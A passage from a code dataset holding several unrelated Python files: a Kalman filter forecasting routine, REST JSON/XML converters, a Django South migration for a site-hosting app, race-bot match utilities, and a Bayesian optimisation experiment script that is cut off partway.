Parameters:\n ----------\n freq_basis_array (`float64`): Array containing `numf` number of basis frequencies.\n x_hat (`float64`): Aposteriori KF estimates based on msmt_record.\n Delta_T_Sampling (`float64`): Time interval between measurements.\n phase_correction_noisetraces (`float64`): Applies depending on choice of basis\n num (`int`): Number of points in msmt_record.\n n_train (`int`): Predicted timestep at which algorithm is expected to finish learning.\n numf (`int`): Number of spectral basis frequencies in freq_basis_array.\n\n Returns:\n -------\n Propagate_Foward (`float64`): Output predictions. Non-zero only\n for n_train < timestep < num.\n instantA (`float64`): Instantaneous amplitude calculated based on\n estimated state x_hat [Dim: numf x num]\n instantP (`float64`): Instantaneous phase calculated based on estimated\n state x_hat [Dim: numf x num]\n '''\n\n instantA, instantP = calc_inst_params(x_hat)\n\n ## PROPAGATE FORWARD USING HARMONIC SUMS\n Propagate_Foward = np.zeros((num))\n\n tn = 0\n for tn in range(n_train, num, 1):\n Propagate_Foward[tn] = instantA[0]*np.cos((Delta_T_Sampling*tn*freq_basis_array[0]*2*np.pi + instantP[0]))\n Propagate_Foward[tn] += np.sum(instantA[1:]*np.cos((Delta_T_Sampling*tn*freq_basis_array[1:]*2*np.pi + instantP[1:] + phase_correction_noisetraces))) # with correction for noise traces \n\n return Propagate_Foward, instantA, instantP\n\n\nZERO_GAIN, PROP_FORWARD = range(2)\nPredictionMethod = {\n \"ZeroGain\": ZERO_GAIN, \n \"PropForward\": PROP_FORWARD\n}\n\ndef kf_2017(y_signal, n_train, n_testbefore, n_predict, Delta_T_Sampling, x0, p0, oe, \n rk, freq_basis_array, phase_correction=0 ,prediction_method=\"ZeroGain\", \n skip_msmts=1, descriptor='Fast_KF_Results', switch_off_save='No', quantised='No'):\n ''' Return LKFFB predictions and save LKFFB analysis as .npz file.\n\n Parameters:\n ----------\n y_signal (`float64`): Array containing measurements for Kalman Filtering [Dim: 1 x num].\n n_train (`int`): Timestep at which algorithm is expected to finish learning.\n n_testbefore (`int`): Number of on step ahead predictions prior to n_train\n which user requires to be returned as output.\n n_predict (`int`): Predictions outside of msmt data.\n Delta_T_Sampling (`float64`): Time interval between measurements.\n x0 (`float64`): x_hat_initial : Initial condition for state estimate, x(0), for all basis\n frequencies.\n p0 (`float64`): P_hat_initial : Initial condition for state covariance estimate, P(0),\n for all basis frequencies.\n oe (`float64`): oekalman : Process noise covariance strength.\n rk (`float64`): rkalman : Measurement noise covariance strength.\n freq_basis_array (`float64`): Array containing basis frequencies.\n phase_correction (`float64`): Phase correction term as dependent on choice \n of built-in Basis and Prediction Method.\n prediction_method : Use ZeroGain OR PropagateForward with Phase Correction.\n skip_msmts : Allow a non zero Kalman gain for every n-th msmt,\n where skip_msmts == n and skip_msmts=1 implies all measurements\n can have a non-zero gain.\n\n Known Information for Filter Design:\n -------------------------------------------------------\n a -- Linearised dynamic model - time invariant [Dim: twonumf x twonumf. dtype = float64]\n h -- Linear measurement action - time invariant [Dim: 1 x twonumf. dtype = float64]\n Gamma2, Gamma -- Process noise features [Dim: twonumf x 1. dtype = float64]\n Q -- Process noise covariance.[Dim: twonumf x twonumf. dtype = float64]\n R -- Measurement noise covariance; equivalent to rkalman for scalar measurement\n noise. [Scalar float64]\n\n Variables for State Estimation and State Covariance Estimation:\n ---------------------------------------------------------------\n x_hat -- Aposteriori estimates (real and estimated imaginary components\n of the state for each basis frequency) [Len: twonumf. dtype = float64].\n x_hat_apriori -- Apriori estimates (real and estimated imaginary components\n of the state for each basis frequency) [Len: twonumf. dtype = float64].\n z_proj -- Apriori predicted measurement [Scalar float64]\n e_z -- Residuals, i.e. z - z_proj [Len: num float64]\n S -- Predicted output covariance estimate (i.e. uncertainty in z_proj)\n [Scalar float64].\n S_inv -- Inverse of S (NB: R must be a positive definite if S is not Scalar)\n [Scalar float64].\n W -- Kalman gain [Dim: twonumf x 1. dtype = float64]\n P_hat -- Aposteriori state covariance estimate (i.e. aposteriori uncertainty\n in estimated x_hat) [Dim: twonumf x twonumf. dtype = float64]\n P_hat_apriori -- Apriori state covariance estimate (i.e. apriori uncertainty in\n estimated x_hat) [Dim: twonumf x twonumf. dtype = float64]\n\n Returns:\n --------\n predictions (`float64`): Output predictions [Len: n_testbefore + n_predict].\n InstantA (`float64`): Instantaneous amplitudes at n_train use for generating predictions\n using Prop Forward [len: numf].\n\n Dimensions:\n -----------\n num (`int`): Number of points in msmt_record.\n numf (`int`): Number of points (spectral basis frequencies) in freq_basis_array.\n twonumf (`int`): 2*numf. (NB: For each basis freq in freq_basis_array, estimators\n have a real and imaginary parts).\n\n '''\n\n return _kf_2017(y_signal, n_train, n_testbefore, n_predict, Delta_T_Sampling, x0, p0, oe, rk, freq_basis_array, phase_correction, PredictionMethod[prediction_method], skip_msmts, descriptor, switch_off_save, quantised)\n\n\ndef _kf_2017(y_signal, n_train, n_testbefore, n_predict, Delta_T_Sampling, x0, p0, oe, rk, freq_basis_array, phase_correction, prediction_method_, skip_msmts, descriptor, switch_off_save, quantised):\n ''' [Wrapper Function] See kf_2017 docstring for detailed definitions. '''\n num = n_train + n_predict\n numf = len(freq_basis_array)\n twonumf = int(numf*2.0)\n\n # Kalman Measurement Data\n z = np.zeros(num)\n z[:] = y_signal\n\n # State Estimation\n x_hat_apriori = np.zeros((twonumf,1)) \n x_hat = np.zeros((twonumf,1))\n e_z = np.zeros(num)\n P_hat_apriori = np.zeros((twonumf,twonumf)) \n P_hat = np.zeros((twonumf,twonumf))\n\n # Dynamical Model\n a = get_dynamic_model(twonumf, Delta_T_Sampling, freq_basis_array, coswave=-1)\n\n # Measurement Action\n h = np.zeros((1,twonumf)) \n h[0,::2] = 1.0\n\n # Initial Conditions\n x_hat[:,0] = x0 \n diag_indx = range(0,twonumf,1)\n P_hat[diag_indx, diag_indx] = p0\n\n store_x_hat = np.zeros((twonumf,1,num))\n store_P_hat = np.zeros((twonumf,twonumf,num))\n store_x_hat[:,:,0] = x_hat\n store_P_hat[:,:,0] = P_hat \n\n store_W = np.zeros((twonumf,1,num)) \n store_S_Outer_W = np.zeros((twonumf,twonumf,num))\n store_Q = np.zeros((twonumf,twonumf,num))\n store_S = np.zeros((1,1,num))\n predictions = np.zeros(n_testbefore + n_predict)\n \n # Start Filtering\n k = 1\n while (k< num): \n \n x_hat_apriori, P_hat_apriori, store_Q[:,:, k]= propagate_states(a, x_hat, P_hat, oe, numf)\n \n if prediction_method_ == ZERO_GAIN and k> (n_train):\n # This loop is equivalent to setting the gain to zero \n x_hat = x_hat_apriori\n store_x_hat[:,:,k] = x_hat\n P_hat = P_hat_apriori\n store_P_hat[:,:,k] = P_hat\n k = k+1 \n continue \n \n W, S = calc_Kalman_Gain(h, P_hat_apriori, rk, quantised=quantised, x_hat_apriori=x_hat_apriori) \n store_S[:,:, k] = S\n \n #Skip msmts \n if k % skip_msmts !=0:\n W = np.zeros((twonumf, 1))\n \n e_z[k] = calc_residuals(h, x_hat_apriori, z[k], quantised=quantised)\n \n x_hat = x_hat_apriori + W*e_z[k]\n store_S_Outer_W[:,:,k] = S*np.outer(W,W.T)\n P_hat = P_hat_apriori - S*np.outer(W,W.T) #Equivalent to outer(W, W)\n \n store_x_hat[:,:,k] = x_hat\n store_P_hat[:,:,k] = P_hat \n store_W[:,:,k] = W\n\n \n if prediction_method_ == PROP_FORWARD and (k==n_train):\n \n # This loop initiates propagation forward at n_train\n Propagate_Foward, instantA, instantP = makePropForward(freq_basis_array, x_hat,Delta_T_Sampling,phase_correction,num,n_train,numf)\n # We use previous state estimates to \"predict\" for n < n_train\n predictions[0:n_testbefore] = calc_pred(store_x_hat[:,:,n_train-n_testbefore:n_train])\n # We use Prop Forward to \"forecast\" for n> n_train\n predictions[n_testbefore:] = Propagate_Foward[n_train:]\n \n if switch_off_save == 'Yes':\n return predictions, store_x_hat\n \n np.savez(descriptor, \n descriptor=descriptor,\n predictions=predictions, \n y_signal=y_signal,\n freq_basis_array= freq_basis_array, \n x_hat=store_x_hat, \n P_hat=store_P_hat, \n a=a,\n h=h,\n z=z, \n e_z=e_z,\n W=store_W,\n Q=store_Q,\n store_S_Outer_W=store_S_Outer_W,\n S=store_S,\n instantA=instantA,\n instantP=instantP,\n oe=oe, \n rk=rk,\n n_train=n_train,\n n_predict=n_predict,\n n_testbefore=n_testbefore,\n skip_msmts=skip_msmts,\n Propagate_Foward=Propagate_Foward,\n phase_correction=phase_correction)\n \n return predictions\n \n k=k+1\n \n predictions = calc_pred(store_x_hat[:,:,n_train-n_testbefore:], quantised=quantised)\n \n if switch_off_save == 'Yes':\n return predictions, store_x_hat\n\n np.savez(descriptor, descriptor=descriptor,\n predictions=predictions, \n y_signal=y_signal,\n freq_basis_array= freq_basis_array, \n x_hat=store_x_hat, \n P_hat=store_P_hat, \n a=a,\n h=h,\n z=z,\n e_z=e_z,\n W=store_W,\n Q=store_Q,\n store_S_Outer_W=store_S_Outer_W,\n S=store_S,\n oe=oe, \n rk=rk,\n n_train=n_train,\n n_predict=n_predict,\n n_testbefore=n_testbefore,\n skip_msmts=skip_msmts)\n \n return predictions\n\n","sub_path":"kf/fast_2.py","file_name":"fast_2.py","file_ext":"py","file_size_in_byte":12018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"604777026","text":"import json\nfrom xml.etree import ElementTree\nfrom opensearch import OpenSearchDescription\nfrom links import Links\n\n\nclass Converters(object):\n \"\"\"\n Utility methods for converters.\n \"\"\"\n\n types = {}\n\n @staticmethod\n def register(a_type, converter):\n \"Register a converter for the given type.\"\n Converters.types[a_type] = converter\n\n @staticmethod\n def marshaller_for(a_type):\n \"\"\"\n Return a converter for the given type.\n \"\"\"\n return Converters.types.get(a_type) or XmlConverter()\n\n\nclass JsonConverter(object):\n \"\"\"\n Converts objects from and to JSON.\n \"\"\"\n \n def marshal(self, content):\n \"\"\"\n Produces a JSON representation of the given content.\n \"\"\"\n return json.dumps(content)\n\n def unmarshal(self, json_content):\n \"\"\"\n Produces an object for a given JSON content.\n \"\"\"\n return _dict2obj(json.loads(json_content))\n\n\nclass _dict2obj(object):\n def __init__(self, dict_):\n for key, value in dict_.items():\n if isinstance(value, (list, tuple)):\n d = [_dict2obj(x) if isinstance(x, dict) else x for x in value]\n setattr(self, key, d)\n else:\n d = _dict2obj(value) if isinstance(value, dict) else value\n setattr(self, key, d)\n\n\nclass XmlConverter(object):\n \"\"\"\n Converts objects from and to XML.\n \"\"\"\n \n def marshal(self, content):\n \"\"\"\n Produces a XML representation of the given content.\n \"\"\"\n return ElementTree.tostring(self._dict_to_etree(content))\n\n def _dict_to_etree(self, content):\n tree = ElementTree.Element(content.keys()[0])\n self._dict_to_etree_rec(content[content.keys()[0]], tree)\n return tree\n\n def _dict_to_etree_rec(self, content, tree):\n if type(content) == dict:\n for key, value in content.items():\n e = ElementTree.Element(key)\n self._dict_to_etree_rec(value, e)\n tree.append(e)\n else:\n tree.text = str(content)\n\n def unmarshal(self, content):\n \"\"\"\n Produces an ElementTree object for a given XML content.\n \"\"\"\n e = ElementTree.fromstring(content)\n return self._enhance_element_tree(e)\n\n def _enhance_element_tree(self, e):\n for element in e.getiterator():\n for child in list(element):\n if len(element.findall(child.tag)) > 1:\n setattr(element, child.tag, element.findall(child.tag))\n elif len(list(child)) == 0:\n setattr(element, child.tag, child.text)\n else:\n setattr(element, child.tag, element.find(child.tag))\n\n l = []\n for element in e.getiterator('link'):\n d = {'href': element.attrib.get('href'),\n 'rel': element.attrib.get('rel'),\n 'type': element.attrib.get('type') or 'application/xml'}\n\n l.append(d)\n\n e.links = lambda: Links(l)\n e.link = lambda x: e.links().get(x)\n\n return e\n\n\nclass OpenSearchConverter(object):\n def marshal(self, content):\n return XmlConverter().marshal(content)\n\n def unmarshal(self, content):\n e_tree = ElementTree.fromstring(content)\n return OpenSearchDescription(e_tree)\n\n\nclass PlainConverter(object):\n def marshal(self, content):\n return content\n\n def unmarshal(self, content):\n return content\n\nConverters.register('application/xml', XmlConverter())\nConverters.register('text/xml', XmlConverter())\nConverters.register('xml', XmlConverter())\nConverters.register('text/plain', PlainConverter())\nConverters.register('text/json', JsonConverter())\nConverters.register('application/json', JsonConverter())\nConverters.register('json', JsonConverter())\nConverters.register('application/opensearchdescription+xml',\n OpenSearchConverter())\n","sub_path":"restfulie/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"38502418","text":"\nfrom south.db import db\nfrom django.db import models\nfrom kong.models import *\n\nclass Migration:\n \n def forwards(self, orm):\n \n # Adding model 'TestResult'\n db.create_table('kong_testresult', (\n ('id', models.AutoField(primary_key=True)),\n ('test', models.ForeignKey(orm.Test, related_name='test_results')),\n ('site', models.ForeignKey(orm.Site, related_name='test_results')),\n ('run_date', models.DateTimeField(default=datetime.datetime.now)),\n ('duration', models.IntegerField(null=True)),\n ('succeeded', models.BooleanField()),\n ('content', models.TextField()),\n ))\n db.send_create_signal('kong', ['TestResult'])\n \n # Adding model 'Server'\n db.create_table('kong_server', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=80, blank=True)),\n ('slug', models.SlugField()),\n ('hostname', models.CharField(max_length=100)),\n ('internalip', models.IPAddressField(null=True, blank=True)),\n ('externalip', models.IPAddressField(null=True, blank=True)),\n ))\n db.send_create_signal('kong', ['Server'])\n \n # Adding model 'HostedSite'\n db.create_table('kong_hostedsite', (\n ('site_ptr', models.OneToOneField(orm['kong.Site'])),\n ('servername', models.CharField(default='example.com', max_length=100)),\n ('maxclients', models.IntegerField(default=30, null=True, blank=True)),\n ('wsgi_processes', models.IntegerField(default=5, null=True, blank=True)),\n ('wsgi_max_requests', models.IntegerField(default=500, null=True, blank=True)),\n ('serveradmin', models.CharField(max_length=100, null=True, blank=True)),\n ('mediaserver', models.CharField(max_length=100, null=True, blank=True)),\n ))\n db.send_create_signal('kong', ['HostedSite'])\n \n # Adding model 'Client'\n db.create_table('kong_client', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=100, blank=True)),\n ('slug', models.SlugField(blank=True)),\n ('phone', USmodels.PhoneNumberField(blank=True)),\n ('email', models.EmailField(blank=True)),\n ('contact', models.CharField(max_length=100, blank=True)),\n ))\n db.send_create_signal('kong', ['Client'])\n \n # Adding model 'Site'\n db.create_table('kong_site', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=80, blank=True)),\n ('slug', models.SlugField()),\n ('type', models.ForeignKey(orm.Type, related_name='sites')),\n ('client', models.ForeignKey(orm.Client, related_name='sites', null=True, blank=True)),\n ('settings', models.CharField(max_length=80)),\n ('pythonpath', models.CharField(default='/home/code.django-1.0', max_length=255)),\n ('is_live', models.BooleanField(default=False)),\n ))\n db.send_create_signal('kong', ['Site'])\n \n # Adding model 'Alias'\n db.create_table('kong_alias', (\n ('id', models.AutoField(primary_key=True)),\n ('site', models.ForeignKey(orm.HostedSite, related_name=\"aliases\")),\n ('url', models.CharField(max_length=100)),\n ))\n db.send_create_signal('kong', ['Alias'])\n \n # Adding model 'Test'\n db.create_table('kong_test', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.SlugField(blank=True)),\n ('body', models.TextField()),\n ))\n db.send_create_signal('kong', ['Test'])\n \n # Adding model 'DeployTarget'\n db.create_table('kong_deploytarget', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.SlugField(blank=True)),\n ('is_active', models.BooleanField()),\n ('last_deployed', models.DateTimeField()),\n ))\n db.send_create_signal('kong', ['DeployTarget'])\n \n # Adding model 'Type'\n db.create_table('kong_type', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=40)),\n ('slug', models.SlugField(blank=True)),\n ))\n db.send_create_signal('kong', ['Type'])\n \n \n \n def backwards(self, orm):\n \n # Deleting model 'TestResult'\n db.delete_table('kong_testresult')\n \n # Deleting model 'Server'\n db.delete_table('kong_server')\n \n # Deleting model 'HostedSite'\n db.delete_table('kong_hostedsite')\n \n # Deleting model 'Client'\n db.delete_table('kong_client')\n \n # Deleting model 'Site'\n db.delete_table('kong_site')\n \n # Deleting model 'Alias'\n db.delete_table('kong_alias')\n \n # Deleting model 'Test'\n db.delete_table('kong_test')\n \n # Deleting model 'DeployTarget'\n db.delete_table('kong_deploytarget')\n \n # Deleting model 'Type'\n db.delete_table('kong_type')\n \n \n \n models = {\n 'kong.testresult': {\n 'Meta': {'ordering': \"('-run_date',)\"},\n 'content': ('models.TextField', [], {}),\n 'duration': ('models.IntegerField', [], {'null': 'True'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'run_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now'}),\n 'site': ('models.ForeignKey', [\"orm['kong.Site']\"], {'related_name': \"'test_results'\"}),\n 'succeeded': ('models.BooleanField', [], {}),\n 'test': ('models.ForeignKey', [\"orm['kong.Test']\"], {'related_name': \"'test_results'\"})\n },\n 'kong.server': {\n 'clients': ('ManyToManyField_NoSyncdb', [\"orm['kong.HostedSite']\"], {'db_table': \"'kong_hostedsite_on_servers'\"}),\n 'externalip': ('models.IPAddressField', [], {'null': 'True', 'blank': 'True'}),\n 'hostname': ('models.CharField', [], {'max_length': '100'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'internalip': ('models.IPAddressField', [], {'null': 'True', 'blank': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '80', 'blank': 'True'}),\n 'slug': ('models.SlugField', [], {})\n },\n 'kong.hostedsite': {\n 'Meta': {'_bases': ['kong.models.Site']},\n 'maxclients': ('models.IntegerField', [], {'default': '30', 'null': 'True', 'blank': 'True'}),\n 'mediaserver': ('models.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),\n 'on_servers': ('models.ManyToManyField', [\"orm['kong.Server']\"], {'related_name': '\"sites\"', 'null': 'True', 'blank': 'True'}),\n 'serveradmin': ('models.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),\n 'servername': ('models.CharField', [], {'default': \"'example.com'\", 'max_length': '100'}),\n 'site_ptr': ('models.OneToOneField', [\"orm['kong.Site']\"], {}),\n 'wsgi_max_requests': ('models.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'}),\n 'wsgi_processes': ('models.IntegerField', [], {'default': '5', 'null': 'True', 'blank': 'True'})\n },\n 'kong.client': {\n 'contact': ('models.CharField', [], {'max_length': '100', 'blank': 'True'}),\n 'email': ('models.EmailField', [], {'blank': 'True'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '100', 'blank': 'True'}),\n 'phone': ('USmodels.PhoneNumberField', [], {'blank': 'True'}),\n 'slug': ('models.SlugField', [], {'blank': 'True'})\n },\n 'kong.site': {\n 'client': ('models.ForeignKey', [\"orm['kong.Client']\"], {'related_name': \"'sites'\", 'null': 'True', 'blank': 'True'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'is_live': ('models.BooleanField', [], {'default': 'False'}),\n 'name': ('models.CharField', [], {'max_length': '80', 'blank': 'True'}),\n 'pythonpath': ('models.CharField', [], {'default': \"'/home/code.django-1.0'\", 'max_length': '255'}),\n 'settings': ('models.CharField', [], {'max_length': '80'}),\n 'slug': ('models.SlugField', [], {}),\n 'type': ('models.ForeignKey', [\"orm['kong.Type']\"], {'related_name': \"'sites'\"})\n },\n 'kong.alias': {\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'site': ('models.ForeignKey', [\"orm['kong.HostedSite']\"], {'related_name': '\"aliases\"'}),\n 'url': ('models.CharField', [], {'max_length': '100'})\n },\n 'kong.test': {\n 'body': ('models.TextField', [], {}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '250'}),\n 'sites': ('models.ManyToManyField', [\"orm['kong.Site']\"], {'related_name': \"'tests'\", 'null': 'True', 'blank': 'True'}),\n 'slug': ('models.SlugField', [], {'blank': 'True'}),\n 'types': ('models.ManyToManyField', [\"orm['kong.Type']\"], {'related_name': \"'tests'\", 'null': 'True', 'blank': 'True'})\n },\n 'kong.deploytarget': {\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'is_active': ('models.BooleanField', [], {}),\n 'last_deployed': ('models.DateTimeField', [], {}),\n 'name': ('models.CharField', [], {'max_length': '250'}),\n 'servers': ('models.ManyToManyField', [\"orm['kong.Server']\"], {}),\n 'slug': ('models.SlugField', [], {'blank': 'True'})\n },\n 'kong.type': {\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '40'}),\n 'slug': ('models.SlugField', [], {'blank': 'True'})\n }\n }\n \n complete_apps = ['kong']\n","sub_path":"kong/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":10399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"94897020","text":"import datetime\nfrom typing import Optional\n\nfrom necrobot.match.matchgsheetinfo import MatchGSheetInfo\nfrom necrobot.match import matchdb\nfrom necrobot.match.match import Match\nfrom necrobot.match.matchinfo import MatchInfo\nfrom necrobot.race import racedb\nfrom necrobot.race.raceinfo import RaceInfo\n\nmatch_library = {}\n\n\ndef invalidate_cache():\n global match_library\n match_library = {}\n\n\nasync def make_match(register=False, update=False, **kwargs) -> Optional[Match]:\n # noinspection PyIncorrectDocstring\n \"\"\"Create a Match object.\n\n Parameters\n ----------\n racer_1_id: int\n The DB user ID of the first racer.\n racer_2_id: int\n The DB user ID of the second racer.\n max_races: int\n The maximum number of races this match can be. (If is_best_of is True, then the match is a best of\n max_races; otherwise, the match is just repeating max_races.)\n match_id: int\n The DB unique ID of this match. If this parameter is specified, the return value may be None, if no match\n in the database has the specified ID.\n suggested_time: datetime.datetime\n The time the match is suggested for. If no tzinfo, UTC is assumed.\n r1_confirmed: bool\n Whether the first racer has confirmed the match time.\n r2_confirmed: bool\n Whether the second racer has confirmed the match time.\n r1_unconfirmed: bool\n Whether the first racer wishes to unconfirm the match time.\n r2_unconfirmed: bool\n Whether the second racer wishes to unconfirm the match time.\n match_info: MatchInfo\n The types of races to be run in this match.\n cawmentator_id: int\n The DB unique ID of the cawmentator for this match.\n sheet_id: int\n The sheetID of the worksheet the match was created from, if any.\n league_tag: str\n The tag for the league this match is in, if any.\n register: bool\n Whether to register the match in the database. \n update: bool\n If match_id is given and this is True, updates the database match with any other specified parameters.\n \n Returns\n ---------\n Match\n The created match.\n \"\"\"\n if 'match_id' in kwargs and kwargs['match_id'] is not None:\n cached_match = await get_match_from_id(kwargs['match_id'])\n if update and cached_match is not None:\n cached_match.raw_update(**kwargs)\n await cached_match.commit()\n return cached_match\n\n match = Match(commit_fn=matchdb.write_match, **kwargs)\n await match.initialize()\n if register:\n await match.commit()\n match_library[match.match_id] = match\n return match\n\n\nasync def get_match_from_id(match_id: int) -> Match or None:\n \"\"\"Get a match object from its DB unique ID.\n \n Parameters\n ----------\n match_id: int\n The databse ID of the match.\n\n Returns\n -------\n Optional[Match]\n The match found, if any.\n \"\"\"\n if match_id is None:\n return None\n\n if match_id in match_library:\n return match_library[match_id]\n\n raw_data = await matchdb.get_raw_match_data(match_id)\n if raw_data is not None:\n return await make_match_from_raw_db_data(raw_data)\n else:\n return None\n\n\nasync def delete_match(match_id: int) -> None:\n await matchdb.delete_match(match_id=match_id)\n if match_id in match_library:\n del match_library[match_id]\n\n\nasync def make_match_from_raw_db_data(row: list) -> Match:\n match_id = int(row[0])\n if match_id in match_library:\n return match_library[match_id]\n\n match_info = MatchInfo(\n race_info=await racedb.get_race_info_from_type_id(int(row[1])) if row[1] is not None else RaceInfo(),\n ranked=bool(row[9]),\n is_best_of=bool(row[10]),\n max_races=int(row[11])\n )\n\n sheet_info = MatchGSheetInfo()\n sheet_info.wks_id = row[14]\n sheet_info.row = row[15]\n\n new_match = Match(\n commit_fn=matchdb.write_match,\n match_id=match_id,\n match_info=match_info,\n racer_1_id=int(row[2]),\n racer_2_id=int(row[3]),\n suggested_time=row[4],\n finish_time=row[16],\n r1_confirmed=bool(row[5]),\n r2_confirmed=bool(row[6]),\n r1_unconfirmed=bool(row[7]),\n r2_unconfirmed=bool(row[8]),\n cawmentator_id=row[12],\n channel_id=int(row[13]) if row[13] is not None else None,\n gsheet_info=sheet_info,\n autogenned=bool(row[17]),\n league_tag=row[18]\n )\n\n await new_match.initialize()\n match_library[new_match.match_id] = new_match\n return new_match\n\n\nasync def get_race_data(match: Match):\n return await matchdb.get_match_race_data(match.match_id)\n\n\nasync def match_exists_between(racer_1, racer_2) -> bool:\n prior_match_ids = await matchdb.get_matches_between(racer_1.user_id, racer_2.user_id)\n return bool(prior_match_ids)\n","sub_path":"necrobot/match/matchutil.py","file_name":"matchutil.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"616034343","text":"import numpy as np\nimport gpflow as gp\nimport GPy\nimport h5py\n\nimport importlib as imp\nimport Acquisitions\nimp.reload(Acquisitions)\n\nfrom EI_pu_cont_domain import EI_pu_bo_cont_domain\nfrom EI_cont_domain import EI_bo_cont_domain\n\nimport sys\nsys.path.append('../')\nfrom gp_sample_save_to_dataset import *\nfrom plots import *\n\nsys.path.append('../cost_functions')\nsys.path.append('../functions')\n\nfrom six_hump_camel import camel\nfrom six_hump_camel import camel_plots\nfrom six_hump_camel import camel_find_best_suited_kernel\nfrom six_hump_camel import camel_opt\n\ndef find_cell(cost, cost_grid):\n\n index_list= np.where(cost<=cost_grid)[0]\n\n if not len(index_list)==0:\n index= index_list[0]\n return index\n\n else:\n return -1\n\ndef add_loss(loss, count, loss_list, cum_cost_list, cost_grid):\n\n for i in range(len(cum_cost_list)):\n\n index= find_cell(cum_cost_list[i], cost_grid)\n\n if not index==-1:\n loss[index]+= loss_list[i]\n count[index]+= 1\n\n return loss, count\n\n\ndef delete_invalid_loss_and_count(loss_and_count_dict):\n\n new_dict= {}\n for method in loss_and_count_dict:\n count= loss_and_count_dict[method][1]; loss= loss_and_count_dict[method][0]\n cost_grid= loss_and_count_dict[method][2]\n\n invalid= np.where(count==0)[0]\n\n loss= np.delete(loss, invalid)\n count= np.delete(count, invalid)\n cost_grid= np.delete(cost_grid, invalid)\n new_dict[method]= [loss,count,cost_grid ]\n\n return new_dict\n\n'''load data'''\n\ndisc= 21\ny_true_opt, x_true_opt, domain= camel_opt()\nX, Y= camel_plots(disc)\nmodel ,kernel= camel_find_best_suited_kernel(X, Y, noise=10**(-4))\ninput_dimension= 2; objective_func= camel;\n\n\noutput_dimension= 1; cost_dimension= 1;\n\n\nls_cost= 1.0; var_cost= 1.0\nbudget= 10\nnoise= 10**(-4); noise_cost= 10**(-4)\n\ndimension= 2 ;budget=15; num_iter=100\n\nls= 1.0; var= 1.0; ls_cost= 1.0; var_cost= 1.0; rang= 20; disc= 30; kern_type= 'rbf'; noise= 10**(-4)\ncost_kernel= gp.kernels.RBF(lengthscales= [ls_cost], variance= var_cost)\n\n#\n# with h5py.File('../datasets/{}d/gp_sample_{}_l_{}_v_{}_rang_{}_disc{}.h5'.format(dimension, kern_type, ls, var, rang, disc), 'r') as hf:\n# X= np.array(hf.get('X')); Y= np.array(hf.get('y_sample'))\n#\n# with h5py.File('../datasets/cost_{}d/gp_cost_sample_{}_l_{}_v_{}_rang_{}_disc{}.h5'.format(dimension, kern_type, ls_cost, var_cost, rang, disc), 'r') as hf:\n# X_cost= np.array(hf.get('X')); Y_cost= np.array(hf.get('y_sample'))\n\n\n# random_index= np.random.permutation(np.arange(disc**dimension))[0:num_iter]\n\nplot_samples= False; plot_loss_at_each_iteration= False\n\n\ncost_grid= np.linspace(0, 3/2*budget, int(3/2*budget*2))\n\n\ncount_ei= np.zeros(cost_grid.shape); loss_ei= np.zeros(cost_grid.shape);\ncount_ei_pu= np.zeros(cost_grid.shape); loss_ei_pu= np.zeros(cost_grid.shape);\n\n\nfor i in range(num_iter):\n\n x01 = np.random.uniform(domain[0][0], domain[0][1]);\n x02 = np.random.uniform(domain[1][0], domain[1][1])\n x0 = np.array([[x01, x02]])\n\n '''ei'''\n loss_list_EI, Xt_EI, Yt_EI, model_EI, cost_list_EI, cum_cost_list_EI= EI_bo_cont_domain(input_dimension, output_dimension,\n cost_dimension, objective_func, y_true_opt, x_true_opt, domain, kernel, budget, x0,\n cost_kernel, noise=10**(-4), noise_cost= 10**(-4), plot=False, plot_cost= False)\n\n loss_ei, count_ei= add_loss(loss_ei, count_ei, loss_list_EI, np.atleast_1d(np.array(cum_cost_list_EI).squeeze()),\n cost_grid)\n\n '''ei_pu'''\n loss_list_EI_pu, Xt_EI_pu, Yt_EI_pu, model_EI_pu, cost_list_EI_pu, cum_cost_list_EI_pu\\\n = EI_pu_bo_cont_domain(input_dimension, output_dimension, cost_dimension, objective_func,\n y_true_opt, x_true_opt, domain, kernel, budget, x0, cost_kernel, noise=10**(-4),\n noise_cost= 10**(-4), plot=False, plot_cost= False)\n\n loss_ei_pu, count_ei_pu = add_loss(loss_ei_pu, count_ei_pu\n , loss_list_EI_pu, np.atleast_1d(np.array(cum_cost_list_EI_pu).squeeze())\n , cost_grid)\n\n if plot_loss_at_each_iteration:\n\n plt.figure()\n plt.title('loss vs cost')\n plt.plot(np.squeeze(cum_cost_list_EI_pu), np.array(loss_list_EI_pu), label= 'ei_per_cost', color= 'blue')\n plt.scatter(np.squeeze(cum_cost_list_EI_pu), np.array(loss_list_EI_pu), label= 'ei_per_cost', color= 'blue')\n 